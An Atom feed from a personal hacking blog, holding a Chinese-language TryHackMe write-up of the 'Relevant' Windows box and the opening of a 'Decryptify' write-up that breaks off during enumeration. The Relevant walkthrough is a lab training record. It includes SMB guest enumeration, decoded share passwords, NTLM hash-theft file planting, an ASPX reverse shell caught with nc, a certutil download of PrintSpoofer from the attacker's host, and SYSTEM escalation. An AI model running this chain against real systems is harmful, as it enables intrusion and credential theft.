<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <title>0x5t4ckc47&apos;s Hacking Blog</title>
  <subtitle>No description</subtitle>
  <link href="https://0x5t4ckc47.github.io/" rel="alternate" type="text/html"/>
  <link href="https://0x5t4ckc47.github.io/atom.xml" rel="self" type="application/atom+xml"/>
  <id>https://0x5t4ckc47.github.io/</id>
  <updated>2026-09-19T00:00:00.000Z</updated>
  <entry>
    <title>relevant</title>
    <link href="https://0x5t4ckc47.github.io/posts/relevant-thm/relevant/" rel="alternate" type="text/html"/>
    <id>https://0x5t4ckc47.github.io/posts/relevant-thm/relevant/</id>
    <published>2026-09-19T00:00:00.000Z</published>
    <updated>2026-09-19T00:00:00.000Z</updated>
    <summary>老 box 就是劲, 兔子洞批发不要钱</summary>
    <content type="html"><![CDATA[<h1>Recon</h1>
<p>:::note
box 中途出现过崩溃, 重启后更换了 IP
:::</p>
<pre><code>PORT      STATE SERVICE       REASON          VERSION
80/tcp    open  http          syn-ack ttl 128 Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp   open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  syn-ack ttl 128 Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp  open  ms-wbt-server syn-ack ttl 128 Microsoft Terminal Services
|_ssl-date: 2026-09-19T05:30:43+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=Relevant
| Issuer: commonName=Relevant
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-09-18T05:25:54
| Not valid after:  2027-03-20T05:25:54
| MD5:   421a:91c3:dbab:e462:5fc2:9f1f:49fc:fb38
| SHA-1: dd5c:8cdf:fdf8:146f:84ea:3a7f:3034:ad49:f5c4:fb81
| -----BEGIN CERTIFICATE-----
| MIIC1DCCAbygAwIBAgIQHi6nxU8uK5xEeeUBXP4XFzANBgkqhkiG9w0BAQsFADAT
| MREwDwYDVQQDEwhSZWxldmFudDAeFw0yNjA5MTgwNTI1NTRaFw0yNzAzMjAwNTI1
| NTRaMBMxETAPBgNVBAMTCFJlbGV2YW50MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A
| MIIBCgKCAQEAz2lsGBSt5IrCOKcnD+W9IGDacVNfPYj/nzPKW+OxokJKAVyFO1O+
| csR/JwrfkfhaqGfxlX8NJSi29/jI+fns4QoN2LESOFeKZdc02o4w+wXN47AaFYJl
| TUwLlvhtQ941glXGi8Gm2u2pF/BCQFFH42TlUiE0hEMynuyrjQUcL8AOR5BzaLYZ
| UX7xKtyz+c/YejXGJ1E5UvaBwh7jQD7cbHFW4LlkBUGAoTrK0/z+G5otu3jknWN4
| MMsxMJienTwIvET5ortuhM63rRHIIdFqY4Jf8ovsf8PLeW6TI7qn2G1bMdlkGIDy
| g5tKSIHYtYqc/ljYoMLSFNpwTuHbaRdsdwIDAQABoyQwIjATBgNVHSUEDDAKBggr
| BgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQELBQADggEBAA9Jpavx+1gy
| wqS/tm4up8zlLmE4MzQ89JKRnrcxCz8yRZzyyzIgfZXv3GSNcw+SaeYLVVT9Gqe1
| 8HPxk77ulcmKLStg2C37VsYD+tUV3Y4M+oiIUQYuLLGj1STMUV6Y9A2t9nLNwNoG
| Lc0zNefF1nG4slQ4+CZQ3ZkSnp5AhA2BI1xL+fUrwWSAexUD33WwCjzcKeKZXjlH
| 7CVSsGHSAYWLaS+t6GwCiW2jHNKMJbypCE5Ct1lphs6VUOHfyj9PuSm9R7hOCHAP
| 4kTigbz5DYwlVOVDhhr+J+H6XeXn4G2oP7xDroHPu+gYZ5yRgVMxbp4VzMLnqgh4
| PNHOeIK0in8=
|_-----END CERTIFICATE-----
| rdp-ntlm-info: 
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2026-09-19T05:30:03+00:00
49663/tcp open  http          syn-ack ttl 128 Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
49666/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 35819/tcp): CLEAN (Timeout)
|   Check 2 (port 25628/tcp): CLEAN (Timeout)
|   Check 3 (port 32369/udp): CLEAN (Timeout)
|   Check 4 (port 30521/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 1h23m59s, deviation: 3h07m50s, median: -1s
| smb2-time: 
|   date: 2026-09-19T05:30:06
|_  start_date: 2026-09-19T05:25:53
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: Relevant
|   NetBIOS computer name: RELEVANT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2026-09-18T22:30:05-07:00
</code></pre>
<p>Windows 机器, 没有开放活动目录相关端口, 主机名为 <code>RELEANT</code> 开放 SMB 相关组件, 根据 workgroup 推测不是一台 DC 或不在域中.</p>
<h2>smb</h2>
<p>guest 认证成功, 可以列出共享</p>
<pre><code>nxc smb 10.66.179.167 -u guest -p '' --shares
SMB         10.66.179.167   445    RELEVANT         [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:RELEVANT) (domain:Relevant) (signing:False) (SMBv1:True)
SMB         10.66.179.167   445    RELEVANT         [+] Relevant\guest: 
SMB         10.66.179.167   445    RELEVANT         [*] Enumerated shares
SMB         10.66.179.167   445    RELEVANT         Share           Permissions            Remark
SMB         10.66.179.167   445    RELEVANT         -----           -----------            ------
SMB         10.66.179.167   445    RELEVANT         ADMIN$                                 Remote Admin
SMB         10.66.179.167   445    RELEVANT         C$                                     Default share
SMB         10.66.179.167   445    RELEVANT         IPC$            READ                   Remote IPC
SMB         10.66.179.167   445    RELEVANT         nt4wrksv        READ,WRITE
</code></pre>
<p><code>nt4wrksv</code> 共享可读写</p>
<pre><code>smbclient.py guest:''@10.66.179.167
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
Type help for list of commands
# use nt4wrksv  
# ls
drw-rw-rw-          0  Sat Jul 25 21:46:04 2020 .
drw-rw-rw-          0  Sat Jul 25 21:46:04 2020 ..
-rw-rw-rw-         98  Sat Jul 25 15:35:44 2020 passwords.txt
</code></pre>
<p>有一个 <code>passwords.txt</code>, 下载后得到一串编码后的密码, 根据格式推测为 base64 加密:</p>
<pre><code>[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
</code></pre>
<p>解密后分别为:</p>
<pre><code>Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$
</code></pre>
<p>两个凭据均有效, 但 Bill 被降级为 guest:</p>
<pre><code>nxc smb 10.66.179.167 -u ./users  -p ./pass --continue-on-success
SMB         10.66.179.167   445    RELEVANT         [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:RELEVANT) (domain:Relevant) (signing:False) (SMBv1:True)
SMB         10.66.179.167   445    RELEVANT         [-] Relevant\Bob:Juw4nnaM4n420696969!$$$ STATUS_LOGON_FAILURE 
SMB         10.66.179.167   445    RELEVANT         [+] Relevant\Bill:Juw4nnaM4n420696969!$$$ (Guest)
SMB         10.66.179.167   445    RELEVANT         [+] Relevant\Bob:!P@$$W0rD!123
</code></pre>
<h2>RidBrute</h2>
<p><code>$IPC</code> 共享可读, 执行 rid 爆破:</p>
<pre><code>nxc smb 10.66.179.167 -u Bob -p '!P@$$W0rD!123' --rid-brute
SMB         10.66.179.167   445    RELEVANT         [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:RELEVANT) (domain:Relevant) (signing:False) (SMBv1:True)
SMB         10.66.179.167   445    RELEVANT         [+] Relevant\Bob:!P@$$W0rD!123 
SMB         10.66.179.167   445    RELEVANT         500: RELEVANT\Administrator (SidTypeUser)
SMB         10.66.179.167   445    RELEVANT         501: RELEVANT\Guest (SidTypeUser)
SMB         10.66.179.167   445    RELEVANT         503: RELEVANT\DefaultAccount (SidTypeUser)
SMB         10.66.179.167   445    RELEVANT         513: RELEVANT\None (SidTypeGroup)
SMB         10.66.179.167   445    RELEVANT         1002: RELEVANT\Bob (SidTypeUser)
</code></pre>
<p>这解释了为什么 <code>Bill</code> 会被降级为 guest, 因为机器上没有对应的用户</p>
<h1>Web - 80</h1>
<p>标准的 IIS 页面, 没什么信息.</p>
<p><img src="./iismain.png" alt="iis" /></p>
<p>目录爆破没给出什么有效信息</p>
<pre><code>dirsearch -u http://10.66.179.167 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-words-lowercase.txt -e asp

  _|. _ _  _  _  _ _|_    v0.4.3.post1
 (_||| _) (/_(_|| (_| )

Extensions: asp | HTTP method: GET | Threads: 25 | Wordlist size: 38267

Output File: /root/wrk/reports/http_10.66.179.167/_26-09-19_05-32-00.txt

Target: http://10.66.179.167/

[05:32:00] Starting: 
[05:32:01] 404 -    2KB - /.aspx
[05:32:05] 404 -    2KB - /.ashx
[05:32:08] 404 -    2KB - /.asmx
[05:32:10] 404 -    2KB - /.css.aspx
[05:32:40] 404 -    2KB - /con
[05:32:40] 404 -    2KB - /.html.
[05:33:05] 404 -    2KB - /.captcha.aspx
[05:33:10] 404 -    2KB - /.htm.
[05:33:15] 404 -    2KB - /.csshandler.ashx
[05:33:38] 404 -    2KB - /.php.
[05:33:41] 404 -    2KB - /aux
[05:33:49] 404 -    2KB - /.aspx.aspx
[05:34:48] 404 -    2KB - /prn
[05:34:54] 404 -    2KB - /.search.
[05:35:35] 404 -    2KB - /.aspx.
[05:35:36] 404 -    2KB - /.js.aspx
[05:35:36] 404 -    2KB - /.pdf.
[05:36:44] 404 -    2KB - /.c.

Task Completed
</code></pre>
<h2>techstack</h2>
<pre><code>HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sat, 25 Jul 2020 15:05:21 GMT
Accept-Ranges: bytes
ETag: "2db43349562d61:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Sat, 19 Sep 2026 05:29:38 GMT
Content-Length: 703
</code></pre>
<p>没啥有效信息</p>
<h1>Web - 49663</h1>
<p>还是 IIS 默认页面:
<img src="./iis-49663.png" alt="iis-49663" /></p>
<pre><code>dirsearch -u http://10.66.179.167:49663 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-words-lowercase.txt -e asp 
404     2KB  http://10.66.179.167:49663/.aspx
301    164B   http://10.66.179.167:49663/aspnet_client    -&gt; REDIRECTS TO: http://10.66.179.167:49663/aspnet_client/
404     2KB  http://10.66.179.167:49663/.ashx
404     2KB  http://10.66.179.167:49663/.asmx
404     2KB  http://10.66.179.167:49663/.css.aspx
404     2KB  http://10.66.179.167:49663/con
404     2KB  http://10.66.179.167:49663/.html.
404     2KB  http://10.66.179.167:49663/.captcha.aspx
404     2KB  http://10.66.179.167:49663/.htm.
404     2KB  http://10.66.179.167:49663/.csshandler.ashx
404     2KB  http://10.66.179.167:49663/.php.
404     2KB  http://10.66.179.167:49663/aux
404     2KB  http://10.66.179.167:49663/.aspx.aspx
404     2KB  http://10.66.179.167:49663/prn
404     2KB  http://10.66.179.167:49663/.search.
404     2KB  http://10.66.179.167:49663/.aspx.
404     2KB  http://10.66.179.167:49663/.js.aspx
404     2KB  http://10.66.179.167:49663/.pdf.
</code></pre>
<p>没啥信息</p>
<h2>techstack</h2>
<pre><code>HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sat, 25 Jul 2020 15:05:21 GMT
Accept-Ranges: bytes
ETag: "2db43349562d61:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Sat, 19 Sep 2026 06:19:52 GMT
Content-Length: 703
</code></pre>
<p>没啥有趣的</p>
<h1>Auth as Bob</h1>
<p>凭据有效, 但无法访问 RDP (没有 Pwn3d!)</p>
<pre><code>nxc rdp 10.66.179.167 -u Bob -p '!P@$$W0rD!123'        
RDP         10.66.179.167   3389   RELEVANT         [*] Windows 10 or Windows Server 2016 Build 14393 (name:RELEVANT) (domain:Relevant) (nla:True)
RDP         10.66.179.167   3389   RELEVANT         [+] Relevant\Bob:!P@$$W0rD!123
</code></pre>
<p>共享方面也没什么变化:</p>
<pre><code>nxc smb 10.66.179.167 -u Bob -p '!P@$$W0rD!123' --shares
SMB         10.66.179.167   445    RELEVANT         [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:RELEVANT) (domain:Relevant) (signing:False) (SMBv1:True)
SMB         10.66.179.167   445    RELEVANT         [+] Relevant\Bob:!P@$$W0rD!123 
SMB         10.66.179.167   445    RELEVANT         [*] Enumerated shares
SMB         10.66.179.167   445    RELEVANT         Share           Permissions            Remark
SMB         10.66.179.167   445    RELEVANT         -----           -----------            ------
SMB         10.66.179.167   445    RELEVANT         ADMIN$                                 Remote Admin
SMB         10.66.179.167   445    RELEVANT         C$                                     Default share
SMB         10.66.179.167   445    RELEVANT         IPC$            READ                   Remote IPC
SMB         10.66.179.167   445    RELEVANT         nt4wrksv        READ,WRITE
</code></pre>
<h2>Rpc Enum</h2>
<p>把视角转向 rpc, 可以认证:</p>
<pre><code>rpcclient -I 10.66.179.167 -U Bob%'!P@$$W0rD!123' RELEVANT
rpcclient $&gt; getusername
Account Name: Bob, Authority Name: RELEVANT
</code></pre>
<p>似乎没有读取共享信息的权限:</p>
<pre><code>rpcclient $&gt; netsharegetinfo nt4wrksv 
result was WERR_ACCESS_DENIED
rpcclient $&gt; netshareenumall 
result was WERR_ACCESS_DENIED
</code></pre>
<p>尝试读取用户信息, 根据这篇文章, <code>NT_STATUS_CONNECTION_DISCONNECTED</code> 即协议太老了</p>
<pre><code>rpcclient $&gt; queryuser 1002
result was NT_STATUS_CONNECTION_DISCONNECTED
rpcclient $&gt; queryuser 500 
result was NT_STATUS_CONNECTION_DISCONNECTED
</code></pre>
<h1>nt4wrksv2shell</h1>
<h2>hashsteal</h2>
<p>尝试窃取 hash:</p>
<pre><code>ntlm_theft -g all -s 10.66.76.106 -f theft
Created: theft/theft.scf (BROWSE TO FOLDER)
Created: theft/theft-(url).url (BROWSE TO FOLDER)
Created: theft/theft-(icon).url (BROWSE TO FOLDER)
Created: theft/theft.lnk (BROWSE TO FOLDER)
Created: theft/theft.rtf (OPEN)
Created: theft/theft-(stylesheet).xml (OPEN)
Created: theft/theft-(fulldocx).xml (OPEN)
Created: theft/theft.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: theft/theft-(handler).htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: theft/theft-(includepicture).docx (OPEN)
Created: theft/theft-(remotetemplate).docx (OPEN)
Created: theft/theft-(frameset).docx (OPEN)
Created: theft/theft-(externalcell).xlsx (OPEN)
Created: theft/theft.wax (OPEN)
Created: theft/theft.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: theft/theft.asx (OPEN)
Created: theft/theft.jnlp (OPEN)
Created: theft/theft.application (DOWNLOAD AND OPEN)
Created: theft/theft.pdf (OPEN AND ALLOW)
Created: theft/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: theft/theft.library-ms (BROWSE TO FOLDER)
Created: theft/Autorun.inf (BROWSE TO FOLDER)
Created: theft/desktop.ini (BROWSE TO FOLDER)
Created: theft/theft.theme (THEME TO INSTALL)
Created: theft/theft.bat (BROWSE TO FOLDER)
Generation Complete.

smbclient.py guest:''@10.66.179.167
# put theft.lnk
# ls
drw-rw-rw-          0  Sat Sep 19 06:40:21 2026 .
drw-rw-rw-          0  Sat Sep 19 06:40:21 2026 ..
-rw-rw-rw-         98  Sat Jul 25 15:35:44 2020 passwords.txt
-rw-rw-rw-       2164  Sat Sep 19 06:46:27 2026 theft.lnk
</code></pre>
<p>但, <code>Responder</code> 里始终没有回应:</p>
<pre><code>root@ip-10-66-76-106:~/wrk# responder -I ens5
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|


[*] Tips jar:
    USDT -&gt; 0xCc98c1D3b8cd9b717b5257827102940e4E17A19A
    BTC  -&gt; bc1q9360jedhhmps5vpl3u05vyg4jryrl52dmazz49

[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]
    DHCPv6                     [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [ens5]
    Responder IP               [10.66.76.106]
    Responder IPv6             [fe80::ff:c4ff:fe1f:4f43]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
    Don't Respond To MDNS TLD  ['_DOSVC']
    TTL for poisoned response  [default]

[+] Current Session Variables:
    Responder Machine Name     [WIN-R2JKUF7L0MR]
    Responder Domain Name      [16WH.LOCAL]
    Responder DCE-RPC Port     [46864]

[*] Version: Responder 3.2.2.0
[*] Author: Laurent Gaffie, &lt;lgaffie@secorizon.com&gt;

[+] Listening for events...
</code></pre>
<h2>nt4wrksv2web</h2>
<p>所有的地方似乎都滴水不漏, 不过可写的 nt4wrksv 共享究竟对应哪个目录还是个谜. 直到我在 Web 上测试了 <code>nt4wrksv</code>:
<img src="./49663-nt4wrksv.png" alt="web-49663-nt4wrksv" /></p>
<p><code>passwords.txt</code> 也可以在其中找到:
<img src="./49663-passwd.png" alt="passwd" /></p>
<p>也就是说, nt4wrksv 共享映射到了 Web 目录 <code>http://10.66.137.211:49663/nt4wrksv/</code> 下, 其是一个 IIS, 会执行 ASP 文件:</p>
<p>::github{repo="borjmz/aspx-reverse-shell"}</p>
<h1>shell as iis</h1>
<pre><code>nc -lvvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.66.137.211 50019
Spawn Shell...
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.


c:\windows\system32\inetsrv&gt;whoami
whoami
iis apppool\defaultapppool

c:\windows\system32\inetsrv&gt;whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
</code></pre>
<p>有 <code>SeImpersonatePrivilege</code> 权限, 采用 <code>PrintSpoofer</code></p>
<h2>PrintSpoofer</h2>
<p>::github{repo="itm4n/PrintSpoofer"}</p>
<p>下载并运行, 但是...这么做没感觉啊..</p>
<pre><code>C:\Users\Bob\Desktop&gt;certutil.exe -urlcache -f http://10.66.76.106:8080/PrintSpoofer64.exe PrintSpoofer64.exe
certutil.exe -urlcache -f http://10.66.76.106:8080/PrintSpoofer64.exe PrintSpoofer64.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

C:\Users\Bob\Desktop&gt;dir
dir
 Volume in drive C has no label.
 Volume Serial Number is AC3C-5CB5

 Directory of C:\Users\Bob\Desktop

09/19/2026  12:26 AM    &lt;DIR&gt;          .
09/19/2026  12:26 AM    &lt;DIR&gt;          ..
09/19/2026  12:26 AM            27,136 PrintSpoofer64.exe
07/25/2020  08:24 AM                35 user.txt
               2 File(s)         27,171 bytes
               2 Dir(s)  20,658,647,040 bytes free

C:\Users\Bob\Desktop&gt;.\PrintSpoofer64.exe -i -c powershell.exe
.\PrintSpoofer64.exe -i -c powershell.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32&gt;
</code></pre>
<h1>shell as system</h1>
<pre><code>PS C:\Windows\system32&gt; whoami /all
whoami /all

USER INFORMATION
----------------

User Name           SID     
=================== ========
nt authority\system S-1-5-18


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes                                        
====================================== ================ ============ ==================================================
BUILTIN\Administrators                 Alias            S-1-5-32-544 Enabled by default, Enabled group, Group owner    
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label            S-1-16-16384                                                   


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeCreateTokenPrivilege                    Create a token object                                              Enabled
SeAssignPrimaryTokenPrivilege             Replace a process level token                                      Enabled
SeLockMemoryPrivilege                     Lock pages in memory                                               Enabled
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeTcbPrivilege                            Act as part of the operating system                                Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeCreatePermanentPrivilege                Create permanent shared objects                                    Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeAuditPrivilege                          Generate security audits                                           Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeTrustedCredManAccessPrivilege           Access Credential Manager as a trusted caller                      Enabled
SeRelabelPrivilege                        Modify an object label                                             Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

PS C:\Windows\system32&gt; ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Ethernet 3:

   Connection-specific DNS Suffix  . : ec2.internal
   Link-local IPv6 Address . . . . . : fe80::c80f:ccc3:ba4d:50ca%7
   IPv4 Address. . . . . . . . . . . : 10.66.137.211
   Subnet Mask . . . . . . . . . . . : 255.255.192.0
   Default Gateway . . . . . . . . . : 10.66.128.1

Tunnel adapter Local Area Connection* 2:

   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : 2001:0:14c9:dc0e:30bf:36c7:f5bd:762c
   Link-local IPv6 Address . . . . . : fe80::30bf:36c7:f5bd:762c%3
   Default Gateway . . . . . . . . . : ::

Tunnel adapter isatap.ec2.internal:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : ec2.internal

PS C:\Windows\system32&gt; gc C:\Users\Administrator\Desktop\root.txt
gc C:\Users\Administrator\Desktop\root.txt
THM{1fk5kf469devly1gl320zafgl345pv}
</code></pre>
]]></content>
    <author><name>0x5t4ckc47</name></author>
    <category term="THM-writeup"/>
  </entry>
  <entry>
    <title>Decryptify-thm</title>
    <link href="https://0x5t4ckc47.github.io/posts/decryptify-thm/decryptify/" rel="alternate" type="text/html"/>
    <id>https://0x5t4ckc47.github.io/posts/decryptify-thm/decryptify/</id>
    <published>2026-09-18T00:00:00.000Z</published>
    <updated>2026-09-18T00:00:00.000Z</updated>
    <summary>i hate oracle</summary>
    <content type="html"><![CDATA[<h1>Recon</h1>
<p>:::notes
Can you decrypt the secrets and get RCE on the system?
:::</p>
<pre><code>PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 64 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fe:96:56:b5:d9:1b:ed:3e:40:9a:a0:a1:bb:94:8b:39 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDBUDCG+dn4vJLo2ppVhbnbbWkPfwNMNSsAk9DLI8wLWAoYrIs7m8AY7kH2j/7Mr082au1i5imda4qnNnX7oimvARha7Pc8xdt/Hd/9Jdp2xg1V86H8gt29Mm9MZDsprOeMhCHtxF0Y/erL7eLbVAz76V4CSo0Lk9Mmqi36G1mb6oT4zxmXm/JimHrblzHYyvsfqDNORh0xPhKfdlrJ2KvhN2MESqv2OzzO25QApvvXUfKUeT8DwEdpy/dRbveqAVmjvabsnxej14N5mRzYHaKMg/Z63zIt7ES4S1eL5ieWfBtDd8EsrwfSKa2/xDiqzvoD/Xopn+rOgrkFB9bGrd1VvNzV1N6PacZ0g76BOXBToH8AzbPVxFAzRHlAMmkZEbi2yOTb62ZMLkCKKD1JqS0nfzwA38a/PvvBEyb5m8kvw9/TNOp8ghcLdWbnKsjPmbglgBsIqK1Fgiu/Z+O8UylzKMOKprPoho8tQF4y+USesnLriVns/JGAYSB9sTFtNAE=
|   256 68:25:61:21:2a:35:fb:da:bb:66:48:1e:ee:4e:13:fc (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFiUF3PfPxb0l8AhySTHaBnfWU3St2T5cm1Nrp0l0OVFTuB4Ug8J/vpuzhl4iGG2n+bH8v3ZRruXovHiayAqp5o=
|   256 ad:3b:a1:e7:de:69:99:d8:04:c0:55:dd:94:df:01:9c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE1IynjBZfhpzq60JlYjpxWeZwR2nnvSf1G/k+qEBnDn
1337/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Login - Decryptify
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre>
<p>两个端口, TTL 均为 64, Linux 默认一跳</p>
<ol>
<li><code>22</code>: SSH</li>
<li><code>1337</code>: Apache Web, cookie 没有设置 httponly</li>
</ol>
<h1>Web</h1>
<p>登陆页面, 有账户密码登陆以及邀请码登录的选项, 页面底部还有一个 API document.
<img src="./web-login.png" alt="login" />
常规登录需要用户名以及邀请码, 经过测试没有任何类似返回信息或延迟等可能的信息泄漏途径.</p>
<p><img src="./invitelogin.png" alt="invitelogin" />
邀请码登录需要邮箱以及邀请码, 经过测试没有任何类似返回信息或延迟等可能的信息泄漏途径.</p>
<p><img src="./api-login.png" alt="apidocslogin" />
API 文档的访问只需要密码</p>
<h2>tech stack</h2>
<pre><code>HTTP/1.1 200 OK
Date: Fri, 18 Sep 2026 14:16:50 GMT
Server: Apache/2.4.41 (Ubuntu)
Set-Cookie: PHPSESSID=5p3tme16f2cii6bf2p1737t9e8; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3220
Content-Type: text/html; charset=UTF-8
</code></pre>
<p>技术栈没有给出什么有趣的信息</p>
<h2>enum</h2>
<pre><code>  _|. _ _  _  _  _ _|_    v0.4.3.post1
